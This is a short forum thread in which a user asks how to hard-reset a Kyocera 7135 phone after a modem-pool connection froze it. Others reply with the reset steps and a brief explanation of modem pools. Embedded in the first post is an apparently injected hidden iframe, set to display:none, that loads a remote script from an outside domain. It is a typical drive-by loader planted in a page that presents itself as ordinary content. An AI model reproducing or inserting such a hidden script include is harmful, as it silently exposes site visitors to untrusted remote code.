+ Reply to Thread

Thread: Hard Reset HELP

Hard Reset HELP

Well it happened, trying to connect to my company modem pool its totally locked up.

Soft resets do nothing and I dont have my manual. Help anyone have the process for a hard reset? Thanks Paul<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Press and hold the backlight button and press the soft reset button at the back. After that select "yes" to clean all the information (by using the up and down key)....,

I hope you have back up for all your information.....

Thanks whatup, holy s&$@, its still messed up a little. The hard reset went fine but when it wanted me to reset I was back to the inverted screen. Took the battery out and waited now all is good but the data is lost. Hopefully the home computer is bad so I will try a hot synch tomorrow at work. At least the 7135 is working again. Thanks again whatup

What's a modem pool and why did you try to connect to it?

A modem pool hunt group is nothing more than a number of digital modems connected to a digital line (typically a channelized T1) sharing one phone number. In other words, when you dial an ISP, you dial into a modem pool. It's just IT speak for such stuff.